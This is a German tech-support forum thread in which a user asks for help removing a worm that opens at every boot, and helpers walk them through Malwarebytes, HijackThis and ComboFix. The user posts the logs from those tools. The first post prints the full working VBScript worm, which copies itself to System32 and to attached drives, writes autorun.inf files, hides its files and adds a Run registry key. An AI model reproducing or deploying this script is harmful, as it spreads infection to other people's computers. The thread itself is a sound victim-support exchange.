|
Bei jedem Hochfahren öffnet sich ein Trojaner-Fenster!? Hallo! Ich scheine mir einen Trojaner eingefangen zu haben..:headbang: Ich kann die Festplattenpartitionen nicht mehr via Doppelklick öffnen und immer wenn ich meinen Laptop hochfahre, öffnet sich ein Editor-Fenster mit folgendem Text: 'Mutation of Trojan virus. 'My name is IHNO.vbs On error resume next Dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd,oldname,newname,rgname Set fs = createobject("Scripting.FileSystemObject") Set wn = WScript.CreateObject("WScript.Network") Set mf = fs.getfile(Wscript.ScriptFullname) oldname=CStr(fs.getfilename(Wscript.ScriptFullname)) newname = wn.ComputerName & ".vbs" rgname = Replace(newname,".vbs","") atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe IHNO.vbs" dim text,size size = mf.size check = mf.drive.drivetype Set text=mf.openastextstream(1,-2) do while not text.atendofstream mysource=mysource&text.readline mysource=mysource & vbcrlf Loop mysource=Replace(mysource,oldname,newname) do Set winpath = fs.getspecialfolder(0) Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname) tf.attributes = 32 Set tf=fs.createtextfile(winpath & "\SYSTEM32\" & newname,2,true) tf.write mysource tf.close Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname) tf.attributes = 39 For each flashdrive in fs.drives If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" Then Set tf=fs.getfile(flashdrive.path &"\IHNO.vbs") tf.attributes =32 Set tf=fs.createtextfile(flashdrive.path &"\IHNO.vbs",2,true) tf.write mysource tf.close Set tf=fs.getfile(flashdrive.path &"\IHNO.vbs") tf.attributes =39 Set tf =fs.getfile(flashdrive.path &"\autorun.inf") tf.attributes = 32 Set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true) tf.write atr tf.close Set tf =fs.getfile(flashdrive.path &"\autorun.inf") tf.attributes=39 End If next Set rg = createobject("WScript.Shell") rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname, ".vbs","") if check <> 1 then Wscript.sleep 120000 End if loop while check<>1 Set sd = createobject("Wscript.shell") sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname Achja, IHNO heißt mein Pc..! Ich kenne mich in diesen Bereichen leider nicht sonderlich aus, aber kann ich das Ding irgendwie loswerden? Danke! |
Hi und :hallo: Versuchen wirs mal:daumenhoc Bitte wende als erstes Malwarebytes an (alles löschen was er findet und das Log posten) Als nächstes erstellst du ein Hijackthis Logfile und postest es hier:daumenhoc |
Danke! Also Malwarebytes hat nichts infiziertes entdeckt. Die HiJackthis- Logs kann ich nicht hochladen, weil sie als .log- Dateien hier erkannt werden.. Ich veruschs weiter:dummguck: |
Ahh, kopieren ist ja viel leichter:-) Also hier die log vom Hochfahren: Logfile of Trend Micro HijackThis v2.0.2 [edit] bitte editiere zukünftig deine links, wie es dir u.a. hier angezeigt wird: http://www.trojaner-board.de/22771-a...tml#post171958 danke GUA http://www.smilies.4-user.de/include...lie_be_027.gif [/edit] |
Und hier während des Betriebes: Logfile of Trend Micro HijackThis v2.0.2 Scan saved at 15:27:03, on 17.06.2008 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v7.00 (7.00.6000.16674) Boot mode: Normal Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\Programme\Intel\Wireless\Bin\EvtEng.exe C:\Programme\Intel\Wireless\Bin\S24EvMon.exe C:\WINDOWS\system32\spoolsv.exe c:\programme\gemeinsame dateien\logitech\lvmvfm\LVPrcSrv.exe C:\Programme\AntiVir PersonalEdition Classic\avguard.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\ehome\ehtray.exe C:\WINDOWS\RTHDCPL.EXE C:\Programme\Synaptics\SynTP\SynTPEnh.exe C:\Acer\Empowering Technology\admtray.exe C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe C:\WINDOWS\system32\RUNDLL32.EXE C:\Acer\Empowering Technology\ePower\ePower_DMC.exe C:\PROGRA~1\LAUNCH~1\LManager.exe C:\Programme\AntiVir PersonalEdition Classic\sched.exe C:\Programme\Gemeinsame Dateien\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe C:\Acer\Empowering Technology\eRecovery\Monitor.exe C:\WINDOWS\system32\LVCOMSX.EXE C:\Acer\Empowering Technology\admServ.exe C:\Programme\Acer\OrbiCam\CameraAssistant.exe C:\Programme\Java\jre1.6.0_05\bin\jusched.exe C:\Programme\ScanSoft\OmniPageSE4.0\OpwareSE4.exe C:\Programme\AntiVir PersonalEdition Classic\avgnt.exe C:\Programme\iTunes\iTunesHelper.exe C:\Programme\Microsoft Office\Office12\GrooveMonitor.exe C:\WINDOWS\system32\ctfmon.exe C:\Programme\Microsoft ActiveSync\wcescomm.exe C:\PROGRA~1\MICROS~3\rapimgr.exe c:\Programme\WIDCOMM\Bluetooth Software\bin\btwdins.exe C:\Programme\WIDCOMM\Bluetooth Software\BTTray.exe C:\WINDOWS\system32\cisvc.exe C:\Programme\Cisco Systems\VPN Client\cvpnd.exe C:\WINDOWS\eHome\ehRecvr.exe C:\WINDOWS\eHome\ehSched.exe C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe C:\DOKUME~1\ihno\LOKALE~1\Temp\RtkBtMnt.exe C:\WINDOWS\system32\nvsvc32.exe C:\Programme\Intel\Wireless\Bin\RegSrvc.exe C:\WINDOWS\system32\svchost.exe C:\Programme\Gemeinsame Dateien\Siemens\sws\almsrv\almsrvx.exe C:\Programme\iPod\bin\iPodService.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\wbem\unsecapp.exe C:\WINDOWS\system32\cidaemon.exe C:\Programme\Mozilla Firefox\firefox.exe C:\Dokumente und Einstellungen\ihno\Desktop\HiJackThis.exe R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by IHNO O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Gemeinsame Dateien\Adobe\Acrobat\ActiveX\AcroIEHelper.dll O2 - BHO: Canon Easy Web Print Helper - {68F9551E-0411-48E4-9AAF-4BC42A6A46BE} - C:\Programme\Canon\Easy-WebPrint\EWPBrowseLoader.dll O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MICROS~2\Office12\GRA8E1~1.DLL O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre1.6.0_05\bin\ssv.dll O2 - BHO: (no name) - {7C279A11-087C-4BF2-BE9D-990D6E9E7F59} - C:\WINDOWS\system32\rasdlg32.dll (file missing) O3 - Toolbar: Acer eDataSecurity Management - {5CBE3B7C-1E47-477e-A7DD-396DB0476E29} - C:\WINDOWS\system32\eDStoolbar.dll O3 - Toolbar: Easy-WebPrint - {327C2873-E90D-4c37-AA9D-10AC9BABA46C} - C:\Programme\Canon\Easy-WebPrint\Toolband.dll O4 - HKLM\..\Run: [igfxtray] C:\WINDOWS\system32\igfxtray.exe O4 - HKLM\..\Run: [igfxhkcmd] C:\WINDOWS\system32\hkcmd.exe O4 - HKLM\..\Run: [igfxpers] C:\WINDOWS\system32\igfxpers.exe O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent O4 - HKLM\..\Run: [ehTray] C:\WINDOWS\ehome\ehtray.exe O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE O4 - HKLM\..\Run: [SkyTel] SkyTel.EXE O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE O4 - HKLM\..\Run: [AzMixerSel] C:\Programme\Realtek\InstallShield\AzMixerSel.exe O4 - HKLM\..\Run: [SynTPEnh] C:\Programme\Synaptics\SynTP\SynTPEnh.exe O4 - HKLM\..\Run: [ADMTray.exe] "C:\Acer\Empowering Technology\admtray.exe" O4 - HKLM\..\Run: [eDataSecurity Loader] C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32 O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup O4 - HKLM\..\Run: [nwiz] nwiz.exe /install O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit O4 - HKLM\..\Run: [ePower_DMC] C:\Acer\Empowering Technology\ePower\ePower_DMC.exe O4 - HKLM\..\Run: [Acer ePower Management] C:\Acer\Empowering Technology\ePower\Acer ePower Management.exe boot O4 - HKLM\..\Run: [LManager] C:\PROGRA~1\LAUNCH~1\LManager.exe O4 - HKLM\..\Run: [eRecoveryService] C:\Acer\Empowering Technology\eRecovery\Monitor.exe O4 - HKLM\..\Run: [LVCOMSX] C:\WINDOWS\system32\LVCOMSX.EXE O4 - HKLM\..\Run: [LogitechCameraAssistant] C:\Programme\Acer\OrbiCam\CameraAssistant.exe O4 - HKLM\..\Run: [LogitechVideo[inspector]] C:\Programme\Acer\OrbiCam\InstallHelper.exe /inspect O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Programme\Java\jre1.6.0_05\bin\jusched.exe" O4 - HKLM\..\Run: [LaunchApp] Alaunch O4 - HKLM\..\Run: [SSBkgdUpdate] "C:\Programme\Gemeinsame Dateien\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe" -Embedding -boot O4 - HKLM\..\Run: [OpwareSE4] "C:\Programme\ScanSoft\OmniPageSE4.0\OpwareSE4.exe" O4 - HKLM\..\Run: [avgnt] "C:\Programme\AntiVir PersonalEdition Classic\avgnt.exe" /min O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Programme\Adobe\Reader 8.0\Reader\Reader_sl.exe" O4 - HKLM\..\Run: [QuickTime Task] "C:\Programme\QuickTime\QTTask.exe" -atboottime O4 - HKLM\..\Run: [iTunesHelper] "C:\Programme\iTunes\iTunesHelper.exe" O4 - HKLM\..\Run: [GrooveMonitor] "C:\Programme\Microsoft Office\Office12\GrooveMonitor.exe" O4 - HKLM\..\Run: [IHNO] C:\WINDOWS\SYSTEM32\IHNO.vbs O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Programme\Microsoft ActiveSync\wcescomm.exe" O4 - HKCU\..\Run: [HijackThis startup scan] C:\Dokumente und Einstellungen\ihno\Desktop\HijackThis.exe /startupscan O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOKALER DIENST') O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETZWERKDIENST') O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM') O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user') O4 - Global Startup: BTTray.lnk = ? O4 - Global Startup: VPN Client.lnk = ? O8 - Extra context menu item: Easy-WebPrint - Drucken - res://C:\Programme\Canon\Easy-WebPrint\Toolband.dll/RC_Print.html O8 - Extra context menu item: Easy-WebPrint - Schnelldruck - res://C:\Programme\Canon\Easy-WebPrint\Toolband.dll/RC_HSPrint.html O8 - Extra context menu item: Easy-WebPrint - Vorschau - res://C:\Programme\Canon\Easy-WebPrint\Toolband.dll/RC_Preview.html O8 - Extra context menu item: Easy-WebPrint - Zu Druckliste hinzufügen - res://C:\Programme\Canon\Easy-WebPrint\Toolband.dll/RC_AddToList.html O8 - Extra context menu item: Senden an &Bluetooth-Gerät... - c:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.6.0_05\bin\ssv.dll O9 - Extra 'Tools' menuitem: Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.6.0_05\bin\ssv.dll O9 - Extra button: An OneNote senden - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll O9 - Extra 'Tools' menuitem: An OneNote s&enden - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\INetRepl.dll O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\INetRepl.dll O9 - Extra 'Tools' menuitem: Mobilen Favoriten erstellen... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\INetRepl.dll O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL O9 - Extra button: (no name) - {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - (no file) O9 - Extra button: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Programme\ICQLite\ICQLite.exe (file missing) O9 - Extra 'Tools' menuitem: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Programme\ICQLite\ICQLite.exe (file missing) O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra button: ICQ6 - {E59EB121-F339-4851-A3BA-FE49C35617C2} - C:\Programme\ICQ6\ICQ.exe O9 - Extra 'Tools' menuitem: ICQ6 - {E59EB121-F339-4851-A3BA-FE49C35617C2} - C:\Programme\ICQ6\ICQ.exe O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - h**p://go.microsoft.com/fwlink/?linkid=39204 O16 - DPF: {59136DB4-6CA3-4B40-8F2F-BBF84B6F1E91} (Attachment Upload Control) - h**ps://stream.web.de/mail/activex/mail_upload_11213.cab O18 - Protocol: CDS300 - {AD43AA67-6860-4531-AC8A-0E68F9CF023E} - E:\Player\__CDS2.dll (file missing) O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MICROS~2\Office12\GR99D3~1.DLL O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\GEMEIN~1\Skype\SKYPE4~1.DLL O23 - Service: Automation License Manager Service (almservice) - SIEMENS AG - C:\Programme\Gemeinsame Dateien\Siemens\sws\almsrv\almsrvx.exe O23 - Service: AntiVir PersonalEdition Classic Planer (AntiVirScheduler) - Avira GmbH - C:\Programme\AntiVir PersonalEdition Classic\sched.exe O23 - Service: AntiVir PersonalEdition Classic Guard (AntiVirService) - Avira GmbH - C:\Programme\AntiVir PersonalEdition Classic\avguard.exe O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Programme\Gemeinsame Dateien\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe O23 - Service: AdminWorks Agent X6 (AWService) - Avocent Inc. - C:\Acer\Empowering Technology\admServ.exe O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - c:\Programme\WIDCOMM\Bluetooth Software\bin\btwdins.exe O23 - Service: Cisco Systems, Inc. VPN Service (CVPND) - Cisco Systems, Inc. - C:\Programme\Cisco Systems\VPN Client\cvpnd.exe O23 - Service: Intel(R) PROSet/Wireless Event Log (EvtEng) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\EvtEng.exe O23 - Service: Google Updater Service (gusvc) - Google - C:\Programme\Google\Common\Google Updater\GoogleUpdaterService.exe O23 - Service: iPod-Dienst (iPod Service) - Apple Inc. - C:\Programme\iPod\bin\iPodService.exe O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe O23 - Service: Logitech Process Monitor (LVPrcSrv) - Logitech - c:\programme\gemeinsame dateien\logitech\lvmvfm\LVPrcSrv.exe O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe O23 - Service: Intel(R) PROSet/Wireless Registry Service (RegSrvc) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\RegSrvc.exe O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE Technologies - C:\Programme\WinPcap\rpcapd.exe O23 - Service: Intel(R) PROSet/Wireless Service (S24EventMonitor) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\S24EvMon.exe -- End of file - 12552 bytes Danke schonmal für die Mühe |
Hi bitte wende nun ComboFix (signatur) an:daumenhoc Das log posten und ein neues Hijackthis |
Hier das log von ComboFix: ComboFix 08-06-19.1 - ihno 2008-06-17 15:34:56.1 - FAT32x86 Microsoft Windows XP Professional 5.1.2600.2.1252.49.1031.18.529 [GMT 2:00] ausgeführt von:: C:\Dokumente und Einstellungen\ihno\Desktop\ComboFix.exe * Neuer Wiederherstellungspunkt wurde erstellt WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !! . (((((((((((((((((((((((((((((((((((( Weitere L”schungen )))))))))))))))))))))))))))))))))))))))))))))))) . C:\autorun.inf C:\WINDOWS\system32\_000007_.tmp.dll C:\WINDOWS\system32\_000008_.tmp.dll C:\WINDOWS\system32\_000009_.tmp.dll C:\WINDOWS\system32\_000012_.tmp.dll C:\WINDOWS\system32\_000013_.tmp.dll C:\WINDOWS\system32\_000014_.tmp.dll C:\WINDOWS\system32\drivers\npf.sys C:\WINDOWS\system32\packet.dll C:\WINDOWS\system32\pthreadVC.dll C:\WINDOWS\system32\WanPacket.dll C:\WINDOWS\system32\wpcap.dll D:\Autorun.inf . ((((((((((((((((((((((((((((((((((((((( Drivers/Services ))))))))))))))))))))))))))))))))))))))))))))))))) . -------\Service_NPF ((((((((((((((((((((((( Dateien erstellt von 2008-05-19 bis 2008-06-19 )))))))))))))))))))))))))))))) . 2008-06-17 15:57 . 2008-06-17 15:57 <DIR> d-------- C:\Programme\Microsoft Works 2008-06-17 15:55 . 2008-06-17 15:55 <DIR> d-------- C:\Programme\Microsoft.NET 2008-06-17 15:53 . 2008-06-17 15:53 <DIR> d-------- C:\Programme\Microsoft Visual Studio 8 2008-06-17 15:52 . 2008-06-17 15:52 <DIR> d-------- C:\WINDOWS\SHELLNEW 2008-06-17 15:51 . 2008-06-17 15:51 <DIR> dr-h----- C:\MSOCache 2008-06-17 15:50 . 2008-06-17 15:50 <DIR> d-------- C:\Programme\AmoK 2008-06-17 15:47 . 2008-06-17 15:47 <DIR> d-------- C:\Programme\Malwarebytes' Anti-Malware 2008-06-17 15:47 . 2008-06-17 15:47 <DIR> d-------- C:\Dokumente und Einstellungen\ihno\Anwendungsdaten\Malwarebytes 2008-06-17 15:47 . 2008-06-17 15:47 <DIR> d-------- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Malwarebytes 2008-06-17 15:47 . 2008-06-10 19:02 34,296 --a------ C:\WINDOWS\system32\drivers\mbamcatchme.sys 2008-06-17 15:47 . 2008-06-10 19:02 15,864 --a------ C:\WINDOWS\system32\drivers\mbam.sys 2008-06-13 19:02 . 2008-06-17 15:25 4,198 -rahs---- C:\WINDOWS\system32\IHNO.vbs 2008-06-13 18:58 . 2007-09-21 09:15 217,007 --a------ C:\WINDOWS\system32\BMW.ico 2008-06-13 18:53 . 2008-06-13 18:53 <DIR> d-------- C:\WINDOWS\system32\XPSViewer 2008-06-13 18:53 . 2008-06-13 18:53 <DIR> d-------- C:\Programme\Reference Assemblies 2008-06-13 18:52 . 2006-06-29 13:07 14,048 --------- C:\WINDOWS\system32\spmsg2.dll 2008-06-13 18:49 . 2008-06-13 18:49 <DIR> d-------- C:\Programme\MSXML 6.0 2008-06-13 18:16 . 2008-04-14 17:51 273,024 --------- C:\WINDOWS\system32\dllcache\bthport.sys 2008-06-13 18:15 . 2008-06-17 15:25 4,198 -rahs---- C:\IHNO.vbs 2008-06-11 11:57 . 2008-06-19 15:39 12 --a------ C:\WINDOWS\bthservsdp.dat 2008-06-11 11:09 . 2008-06-11 11:09 <DIR> d--hs---- C:\FOUND.001 2008-06-06 11:06 . 2008-06-06 11:06 <DIR> d-------- C:\Programme\Gemeinsame Dateien\xing shared 2008-05-31 09:51 . 2008-05-31 09:51 <DIR> d-------- C:\Programme\Flash Movie Extract Pilot . (((((((((((((((((((((((((((((((((((( Find3M Bericht )))))))))))))))))))))))))))))))))))))))))))))))))))))) . 2008-05-08 12:28 202,752 ------w C:\WINDOWS\system32\drivers\RMCast.sys 2008-05-08 12:28 202,752 ------w C:\WINDOWS\system32\dllcache\rmcast.sys 2008-05-07 04:55 1,293,824 ----a-w C:\WINDOWS\system32\quartz.dll 2008-05-07 04:55 1,293,824 ------w C:\WINDOWS\system32\dllcache\quartz.dll 2008-04-23 20:16 3,591,680 ------w C:\WINDOWS\system32\dllcache\mshtml.dll 2008-04-22 07:40 625,664 ------w C:\WINDOWS\system32\dllcache\iexplore.exe 2008-04-22 07:39 70,656 ------w C:\WINDOWS\system32\dllcache\ie4uinit.exe 2008-04-22 07:39 13,824 ------w C:\WINDOWS\system32\dllcache\ieudinit.exe 2008-04-20 05:07 161,792 ------w C:\WINDOWS\system32\dllcache\ieakui.dll 2008-03-25 04:51 621,344 ----a-w C:\WINDOWS\system32\mswstr10.dll 2008-03-25 04:51 621,344 ------w C:\WINDOWS\system32\dllcache\mswstr10.dll 2008-03-25 04:51 187,168 ----a-w C:\WINDOWS\system32\msjint40.dll 2008-03-25 04:51 187,168 ------w C:\WINDOWS\system32\dllcache\msjint40.dll 2008-03-20 08:03 1,845,376 ------w C:\WINDOWS\system32\win32k.sys 2008-03-20 08:03 1,845,376 ------w C:\WINDOWS\system32\dllcache\win32k.sys 2006-12-28 15:59 251 ----a-w C:\Programme\wt3d.ini . (((((((((((((((((((((((((((( Autostart Punkte der Registrierung )))))))))))))))))))))))))))))))))))))))) . . REGEDIT4 *Hinweis* leere Eintrage & legitime Standardeintrage werden nicht angezeigt. [HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{7C279A11-087C-4BF2-BE9D-990D6E9E7F59}] C:\WINDOWS\system32\rasdlg32.dll [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "CTFMON.EXE"="C:\WINDOWS\system32\ctfmon.exe" [2004-08-10 20:00 15360] "H/PC Connection Agent"="C:\Programme\Microsoft ActiveSync\wcescomm.exe" [2006-06-21 01:00 1211176] "HijackThis startup scan"="C:\Dokumente und Einstellungen\ihno\Desktop\HijackThis.exe" [2008-06-17 15:41 401720] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "igfxtray"="C:\WINDOWS\system32\igfxtray.exe" [2006-03-23 12:17 94208] "igfxhkcmd"="C:\WINDOWS\system32\hkcmd.exe" [2006-03-23 12:13 77824] "igfxpers"="C:\WINDOWS\system32\igfxpers.exe" [2006-03-23 12:17 118784] "BluetoothAuthenticationAgent"="bthprops.cpl" [2004-08-04 00:58 110592 C:\WINDOWS\system32\bthprops.cpl] "ehTray"="C:\WINDOWS\ehome\ehtray.exe" [2005-08-05 13:34 64512] "RTHDCPL"="RTHDCPL.EXE" [2006-06-28 14:54 16248320 C:\WINDOWS\RTHDCPL.exe] "SkyTel"="SkyTel.EXE" [2006-05-16 18:04 2879488 C:\WINDOWS\SkyTel.exe] "AzMixerSel"="C:\Programme\Realtek\InstallShield\AzMixerSel.exe" [2005-12-21 15:02 53248] "SynTPEnh"="C:\Programme\Synaptics\SynTP\SynTPEnh.exe" [2006-03-03 13:07 761946] "ADMTray.exe"="C:\Acer\Empowering Technology\admtray.exe" [2005-10-24 16:45 2462208] "eDataSecurity Loader"="C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe" [2005-12-27 15:50 69632] "IMJPMIG8.1"="C:\WINDOWS\IME\imjp8_1\IMJPMIG.exe" [2004-08-10 20:00 208952] "MSPY2002"="C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe" [2004-08-10 20:00 59392] "PHIME2002ASync"="C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.exe" [2004-08-10 20:00 455168] "PHIME2002A"="C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.exe" [2004-08-10 20:00 455168] "NvCplDaemon"="C:\WINDOWS\system32\NvCpl.dll" [2006-07-20 05:58 7581696] "nwiz"="nwiz.exe" [2006-07-20 05:58 1519616 C:\WINDOWS\system32\nwiz.exe] "NvMediaCenter"="C:\WINDOWS\system32\NvMcTray.dll" [2006-07-20 05:58 86016] "ePower_DMC"="C:\Acer\Empowering Technology\ePower\ePower_DMC.exe" [2006-08-10 19:29 352256] "Acer ePower Management"="C:\Acer\Empowering Technology\ePower\Acer ePower Management.exe" [2006-05-22 12:54 3080704] "LManager"="C:\PROGRA~1\LAUNCH~1\LManager.exe" [2006-07-20 22:15 593920] "eRecoveryService"="C:\Acer\Empowering Technology\eRecovery\Monitor.exe" [2006-01-24 18:00 397312] "LVCOMSX"="C:\WINDOWS\system32\LVCOMSX.EXE" [2006-06-23 10:39 225280] "LogitechCameraAssistant"="C:\Programme\Acer\OrbiCam\CameraAssistant.exe" [2006-06-26 15:47 331776] "LogitechVideo[inspector]"="C:\Programme\Acer\OrbiCam\InstallHelper.exe" [2006-06-26 15:55 73728] "SunJavaUpdateSched"="C:\Programme\Java\jre1.6.0_05\bin\jusched.exe" [2008-02-22 04:25 144784] "LaunchApp"="Alaunch" [] "SSBkgdUpdate"="C:\Programme\Gemeinsame Dateien\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe" [2006-09-28 13:16 185896] "OpwareSE4"="C:\Programme\ScanSoft\OmniPageSE4.0\OpwareSE4.exe" [2006-10-11 12:45 75304] "avgnt"="C:\Programme\AntiVir PersonalEdition Classic\avgnt.exe" [2008-04-25 20:40 262401] "Adobe Reader Speed Launcher"="C:\Programme\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2008-01-11 22:16 39792] "QuickTime Task"="C:\Programme\QuickTime\QTTask.exe" [2008-03-28 23:37 413696] "iTunesHelper"="C:\Programme\iTunes\iTunesHelper.exe" [2008-03-30 10:36 267048] "GrooveMonitor"="C:\Programme\Microsoft Office\Office12\GrooveMonitor.exe" [2006-10-27 00:47 31016] "IHNO"="C:\WINDOWS\SYSTEM32\IHNO.vbs" [2008-06-17 15:25 4198] [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run] "CTFMON.EXE"="C:\WINDOWS\system32\CTFMON.EXE" [2004-08-10 20:00 15360] "DWQueuedReporting"="C:\PROGRA~1\GEMEIN~1\MICROS~1\DW\dwtrig20.exe" [2007-02-26 09:01 437160] "Picasa Media Detector"="C:\Programme\Picasa2\PicasaMediaDetector.exe" [2007-10-23 22:18 443968] [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system] "InstallVisualStyle"= C:\WINDOWS\Resources\Themes\Royale\Royale.msstyles "InstallTheme"= C:\WINDOWS\Resources\Themes\Royale.theme [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32] "vidc.ffds"= ffdshow.ax [HKLM\~\startupfolder\C:^Dokumente und Einstellungen^All Users^Startmenü^Programme^Autostart^Adobe Reader Speed Launch.lnk] path=C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\Adobe Reader Speed Launch.lnk backup=C:\WINDOWS\pss\Adobe Reader Speed Launch.lnkCommon Startup [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\'STIHL Bildschirmschoner' ] --a------ 2003-02-26 12:22 318976 c:\STIHL\Bildschirmschoner\TaskTray.exe [HKEY_LOCAL_MACHINE\software\microsoft\shared 